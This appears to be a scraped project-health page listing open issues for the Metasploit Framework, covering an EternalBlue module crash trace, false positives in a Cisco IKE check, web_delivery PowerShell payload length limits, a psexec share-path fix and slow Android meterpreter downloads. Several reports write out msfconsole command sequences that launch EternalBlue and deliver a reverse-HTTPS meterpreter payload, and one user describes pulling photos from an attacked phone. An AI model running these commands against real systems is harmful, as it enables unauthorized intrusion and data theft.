Contribulator

Open Issues

bignum too big to convert into `long'

bug

Steps to reproduce

How'd you do it?

use exploit/windows/smb/ms17010_eternalblue
set options for the exploit
run it

This happens with other exploits too.

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Expected behavior

What should happen? Should run without any errors

Current behavior

What happens instead?

[-] 10.x.x.x:139 - RangeError [-] 10.x.x.x:139 - bignum too big to convert into `long' [-] 10.x.x.x:139 - <internal:prelude>:76:in `__read_nonblock' <internal:prelude>:76:in `read_nonblock' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-core-0.1.12/lib/rex/io/stream.rb:72:in `read' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:54:in `recv_packet' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:229:in `send_recv' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:36:in `negotiate_request' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:14:in `negotiate' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:186:in `login' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:310:in `smb1_anonymous_connect_ipc' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:166:in `smb_eternalblue' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:118:in `block in exploit' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:114:in `exploit' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:48:in `<main>'

System stuff

Metasploit version

Framework: 4.16.36-dev Console : 4.16.36-dev

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

[ x] Kali package via apt
[ ] Omnibus installer (nightly)
[ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
[ ] Source install (please specify ruby version)

OS

What OS are you running Metasploit on? 4.12.0-kali2-686

cisco_benigncertain reports false positives

Steps to reproduce

Use the cisco_benigncertain module on a compliant, non-vulnerable IKE implementation, such as strongSwan.

Expected behavior

No vulnerability is reported.

Current behavior

The module reports the target as vulnerable to CVE-2016-6415. The module implementation incorrectly assumes the IKEv1 notification message header to be 36 bytes long, even though the correct length is 40. In IKEv2, it is 36 bytes.

web_delivery + PSH should support full stageless payloads without command line limits

I was expecting to deliver full stageless payloads with PSH + web_delivery but it seems there is a command line limit restriction in the way.

``` use multi/script/web_delivery

set TARGET 2 set payload windows/x64/meterpreterreversehttps set EXTENSIONS stdapi,priv set LHOST a.b.c.d set LPORT xxx set exitonsession false set URIPATH /test

``` well, it really doesn't matter adding stdapi and priv, with the full metsrv is enough to break the command line limit

when downloading payload from /test URI

web_delivery - Exception handling request: Powershell command length is greater than the command line maximum (8192 characters)

problem is downloaded execution method tries to run a command line along the way

$p=[System.Diagnostics.Process]::Start($s);

I don't clearly see why there should be this command line restriction when we are already running powershell code victim side and we are able to execute whatever powershell script we download with IEX

Am I missing something obvious here?

I'm using latest dev version

I've already tried Powershell::remove_comspec and Powershell::exec_in_place with same results. Maybe generated payload should be smarter in this case and not use command line as it will be executed by IEX anyway no matter how large it is.

SMB connection problem fix about ms17_010_psexec.rb

powershell_installed? function:

forget to handle multi folders

STATUSBADNETWORK_NAME exception

``` def powershell_installed?

smbshare = datastore['SHARE']

# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
  smbshare = datastore['SHARE'].dup
  smbshare = smbshare.gsub(/^[\\\/]/,"")
  folder_list = smbshare.split(/[\\\/]/)
  smbshare = folder_list[0]
end

share = "\\\\#{datastore['RHOST']}\\#{smbshare}"

case datastore['SHARE'].upcase
when 'ADMIN$'
  path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
  path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
  path = datastore['PSH_PATH']
end

simple.connect(share)

vprint_status("Checking for #{path}")

if smb_file_exist?(path)
  vprint_status('PowerShell found')
  psh = true
else
  vprint_status('PowerShell not found')
  psh = false
end

simple.disconnect(share)

psh

end ```

It might be the way to fix it. like native_upload function

my english is not good ...

/modules/exploits/windows/smb/ms17010psexec.rb /modules/exploits/windows/smb/psexec.rb

only 4kb/s to download files on meterpreter session android

First of all , sorry for my english i don't know why but to download files in android/meterpreter/reverse_tcp session android i just get 4kb/s of speed. [] Downloaded 4.00 KiB of 268.57 KiB (1.49%): IMG-20180127-WA0007.jpg -> IMG-20180127-WA0007.jpg [] Downloaded 8.00 KiB of 268.57 KiB (2.98%): IMG-20180127-WA0007.jpg -> IMG-20180127-WA0007.jpg [] Downloaded 12.00 KiB of 268.57 KiB (4.47%): IMG-20180127-WA0007.jpg -> IMG-20180127-WA0007.jpg [] Downloaded 16.00 KiB of 268.57 KiB (5.96%): IMG-20180127-WA0007.jpg -> IMG-20180127-WA0007.jpg i only got this issue attacking to android device, in windows it works fine i'm attacking from ubuntu 16.04,kali linux and nethunter and is the same.

Fork:	false
Description present:	true
Homepage present:	true
Readme present:	true
Contributing present:	true
License present:	true
Changelog present:	false
Tests present:	true
Code of conduct present:	true
Issues enabled:	true
Open issues last 6 months:	44
Master commits last 6 months:	30